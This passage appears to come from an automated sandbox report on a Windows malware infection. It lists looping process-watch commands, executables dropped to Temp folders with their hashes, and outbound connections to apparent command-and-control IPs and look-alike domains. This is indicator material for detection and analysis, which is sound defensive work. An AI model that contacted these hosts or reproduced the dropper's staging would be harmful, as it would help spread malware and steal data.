Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe

"C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 1212

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2880"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

C:\Windows\system32\timeout.exe

Timeout /T 1 /Nobreak

C:\Windows\system32\tasklist.exe

Tasklist /fi "PID eq 2300"

C:\Windows\system32\find.exe

find ":"

Network

Country Destination Domain Proto
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 moderzysics.top udp
US 104.21.9.123:443 moderzysics.top tcp
DE 5.75.210.149:443 tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 dawtastream.bet udp
CH 185.208.156.162:80 185.208.156.162 tcp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
GB 104.82.234.109:443 steamcommunity.com tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
LU 45.59.120.8:80 45.59.120.8 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.64.1:443 croprojegies.run tcp
RU 45.93.20.28:80 45.93.20.28 tcp
N/A 127.0.0.1:49884 tcp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.152.202:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
GB 172.217.169.46:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 172.217.169.46:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
N/A 127.0.0.1:49892 tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 104.21.9.123:443 moderzysics.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp

Files

memory/2160-0-0x0000000000CD0000-0x000000000117B000-memory.dmp

memory/2160-1-0x0000000077400000-0x0000000077402000-memory.dmp

memory/2160-2-0x0000000000CD1000-0x0000000000CFF000-memory.dmp

memory/2160-3-0x0000000000CD0000-0x000000000117B000-memory.dmp

memory/2160-4-0x0000000000CD0000-0x000000000117B000-memory.dmp

memory/2160-5-0x0000000000CD0000-0x000000000117B000-memory.dmp

\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

MD5 4cf553af549bd99fa44da57de08620a8
SHA1 67e04f4434f0a63b082b0c8f148f5c100a77e27f
SHA256 d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e
SHA512 4ac6fae3a8aeda3a8a0e01d0e59385f674b72ccea57586b007a1a65e810c4063f2ea85a62f002b9fe522c2a986ae7faf2e0f3f5cb5cc5ccbd2a58851df7b2186

memory/2668-18-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2160-16-0x0000000007410000-0x00000000078BB000-memory.dmp

memory/2160-15-0x0000000000CD0000-0x000000000117B000-memory.dmp

memory/2668-19-0x0000000000331000-0x000000000035F000-memory.dmp

memory/2668-20-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2668-22-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

C:\Users\Admin\AppData\Local\Temp\2EED.tmp\2EEE.tmp\2EEF.bat

MD5 3895cb9413357f87a88c047ae0d0bd40
SHA1 227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA256 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512 a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

memory/2616-43-0x000000001B6B0000-0x000000001B992000-memory.dmp

memory/2616-45-0x0000000001E80000-0x0000000001E88000-memory.dmp

memory/2668-44-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 cebf2b3e5d40ad431f50441119b70dbb
SHA1 1c96802eaf2a39fc9d5e3677beddf68aad829df2
SHA256 b842462014209ac29af76b937c305d3dcb75581155ad1a41e3b3e6fc0eebbe14
SHA512 ac690fd5b4192540c544d8cec9b30c831faef51275b6607f9b6a2c5586b1ea51acd06c1b184051345701f163729000f10e497687f9dbfcf1e246bf5420e6024c

memory/1504-52-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/1504-51-0x000000001B700000-0x000000001B9E2000-memory.dmp

memory/2668-53-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2668-54-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2668-55-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2668-56-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe

MD5 35a4dfb5f0308d20b1e5bf26e0a70509
SHA1 0c72b35b74dadbce4a95c034968913de271aae06
SHA256 40d3baeb6df3e2cd4eed207e773b21989b86ef547de12a748529c2b559025339
SHA512 51b8bf5583a256015daaa8caa9c9868c792ef4a1157b89a6880b365c4c5a1c7416abc2b1fcdde9d1d5d9bb7aaa1c617d5b34124a582ec042ac5a2afa064c60d9

memory/1488-69-0x00000000010C0000-0x0000000001FD4000-memory.dmp

memory/1488-70-0x000000001C280000-0x000000001CDE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dll32.exe

MD5 ffb5c5f8bab4598fada3bbf92d02d66d
SHA1 ae8096c1f160c97874179ea878a61f69bfb9941a
SHA256 f3aa764be17f1a197f94b949cfd88f99c2d67e9fec1f53046ef1b6189f594da1
SHA512 902e8a95b964ef3a48504dcdb3c4f0615212eb942476ec26b88e02a39cbaaf866f3fcbe5cd4374342b80aae9a7e17092a28dbe1d53630493a0b0cee8152a4ccf

memory/2300-76-0x0000000000E60000-0x0000000001416000-memory.dmp

\Users\Admin\AppData\Local\Temp\Costura\05A92EC28EDC5561548638CAA951F864\64\sqlite.interop.dll

MD5 65ccd6ecb99899083d43f7c24eb8f869
SHA1 27037a9470cc5ed177c0b6688495f3a51996a023
SHA256 aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512 533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

memory/2668-97-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107211121\PcAIvJ0.cmd

MD5 c203adcd3b4b1717be1e79d7d234f89c
SHA1 a0c726c32766f5d3e3de1bdc9998da2bb2a657e4
SHA256 bc953bccc3974ff2a40fd6ce700e499d11bfd2463014786a4cb0f7bac6568ad8
SHA512 724f920d5e5f31155629155184a1ccf6299c72da04362062512c154e27bed136292a0af51f423e8e05d8f80426b72f679a01ab9662d4da6ffc06cfcbcd005368

C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/2668-113-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2668-121-0x0000000006940000-0x0000000006DDB000-memory.dmp

memory/1040-124-0x0000000000CA0000-0x000000000113B000-memory.dmp

memory/2668-123-0x0000000006940000-0x0000000006DDB000-memory.dmp

memory/1040-129-0x0000000000CA0000-0x000000000113B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/2752-143-0x0000000000030000-0x00000000000A0000-memory.dmp

memory/2608-150-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2608-159-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2608-158-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2608-161-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2608-156-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2608-154-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2608-152-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2608-148-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2668-167-0x0000000006940000-0x0000000006DDB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/2668-183-0x0000000006940000-0x0000000006DDB000-memory.dmp

memory/2324-186-0x00000000013B0000-0x00000000013C2000-memory.dmp

memory/2324-187-0x0000000000350000-0x0000000000360000-memory.dmp

memory/2668-188-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/2052-205-0x0000000000E30000-0x0000000000E90000-memory.dmp

memory/2044-208-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-212-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-222-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-225-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-224-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2044-220-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-218-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-216-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-214-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-210-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-230-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-233-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat

MD5 16b0f1ff4a568e2eaee5bc0f74b225ae
SHA1 e93ca407f192f3394e62853508b47beaf69d4fb1
SHA256 10ca88c5fa2dd89389b1e69c3f70f7b08342fd4e6771de4a9b888ef74f37b1a9
SHA512 d2c6241b0613d3f7bb7a47de97def1efffb0cc848aceb07b08131ba13f743299c5ef9b623a940d11d2c7dd68892cd85ecfb65c2c1b58d92db92221eb5548c118

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2780-244-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe

MD5 9da08b49cdcc4a84b4a722d1006c2af8
SHA1 7b5af0630b89bd2a19ae32aea30343330ca3a9eb
SHA256 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd
SHA512 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\chromium.exe

MD5 0eb68c59eac29b84f81ad6522d396f59
SHA1 aacfdf3cb1bdd995f63584f31526b11874fc76a5
SHA256 dfa74d5d729e90be6e72b3c811a1299abbc52a1f6d347f011101fb5f719d059f
SHA512 81ee88577d9b665d90bc846aa249c9533aaeed2b7259d15981fcc1686723fe11343b682be25cfa3542117c8a805e40343a7315a69e7204829cbf70f22cca25e7

C:\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\python312.dll

MD5 166cc2f997cba5fc011820e6b46e8ea7
SHA1 d6179213afea084f02566ea190202c752286ca1f
SHA256 c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
SHA512 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

memory/2668-322-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

memory/2668-335-0x0000000006940000-0x0000000006DE1000-memory.dmp

memory/2668-336-0x0000000006940000-0x0000000006DE1000-memory.dmp

memory/1640-337-0x0000000000EB0000-0x0000000001351000-memory.dmp

memory/3056-338-0x000000013F550000-0x0000000140B9B000-memory.dmp

memory/1616-399-0x000000013F8A0000-0x0000000140441000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\Tar7288.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/2668-453-0x0000000006940000-0x0000000006DE1000-memory.dmp

memory/2668-443-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/1640-467-0x0000000000EB0000-0x0000000001351000-memory.dmp

memory/2668-468-0x0000000006940000-0x0000000006DE1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/2668-481-0x0000000006940000-0x000000000702E000-memory.dmp

memory/2668-482-0x0000000006940000-0x000000000702E000-memory.dmp

memory/2012-483-0x0000000001190000-0x000000000187E000-memory.dmp

memory/2800-493-0x00000000000F0000-0x0000000001004000-memory.dmp

memory/2668-494-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2668-495-0x0000000006940000-0x000000000702E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 73636685f823d103c54b30bc457c7f0d
SHA1 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

memory/2012-513-0x0000000001190000-0x000000000187E000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/2308-607-0x00000000045B0000-0x00000000049F0000-memory.dmp

memory/2308-608-0x00000000045B0000-0x00000000049F0000-memory.dmp

memory/2844-609-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2668-610-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe

MD5 7c169698effcdd45b7cbd763d28e87f5
SHA1 4f9db666d66255cd7ca2b0973ff00eae8b155f7a
SHA256 c7fd445ebedd5cfa9a01daccc7c5771a88f1719b6dbfe16c9f0334fc4371250b
SHA512 58335071c6f27e72c8cd505859c9b122ff354395b239697311c1ce17f224c58dd9e2894fbc874c835866a299b3ae9ffab767195a253698fed0d39f3fb15ff8e3

memory/2668-626-0x0000000006940000-0x0000000006C53000-memory.dmp

memory/2668-625-0x0000000006940000-0x0000000006C53000-memory.dmp

memory/2736-627-0x0000000000B90000-0x0000000000EA3000-memory.dmp

memory/2308-628-0x00000000045B0000-0x00000000049F0000-memory.dmp

memory/2844-630-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2308-629-0x00000000045B0000-0x00000000049F0000-memory.dmp

memory/2844-631-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe

MD5 2012699a5e85cd283323c324aa061bc7
SHA1 69d93116908bf4b6c61a9cb2d3f50a5fbb8cec0f
SHA256 937ff3f78062e3aaad013b88bb6e807770d40bb65e538eee9c5de6b1487510b5
SHA512 729e7f19b8dc678a8f8912a9ab64169391259fe9d129ba99ef91360f82f81b2c2e628d68a4d5d9c2e4e3fe9e5c09ff295e6021bb3d23a107d6ab59a361d66683

memory/2668-645-0x0000000006940000-0x0000000006FD7000-memory.dmp

memory/2668-646-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2668-644-0x0000000006940000-0x0000000006FD7000-memory.dmp

memory/1972-647-0x0000000000C20000-0x00000000012B7000-memory.dmp

memory/2736-649-0x0000000000B90000-0x0000000000EA3000-memory.dmp

memory/2668-650-0x0000000006940000-0x0000000006C53000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe

MD5 e935a122d4c4e9c1b44368821a5154ff
SHA1 c93e4b9fb9563cb04a9cd39c75220eaf6007f98f
SHA256 161b8b9257159ff8789d47b9a4f5c4b7c6a6e66470392898a8c301348d28cbb4
SHA512 75a94d4c73fb917adaae4cc2c8e3a74bc4520cd45b87af146b53aca42b194cd26126ad4a2db5efad2aaa41e2874f8b71d58ebab8752c73039e233c8cd94a7e7f

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\5nwvfgbl.default-release\datareporting\glean\pending_pings\b040a549-921e-44b7-903f-2d7e5a1a2d20

MD5 40d41fab08c1b09f80d59994aaf56566
SHA1 9c797aa1fa2c9271cee99af9a3942df2b1bd2ca8
SHA256 90a83b1796a6acbc1da30e3fed79dd779dd4d8afeff12c44eb7f45798c4e18da
SHA512 5bec55689ded1ec596b68081c122a223d17bb86f6cfc343f2b00ab97ca709c6308e8f8cbb2c528684ac07961c1f16568a1060e437309969e25b0acee4d20c790

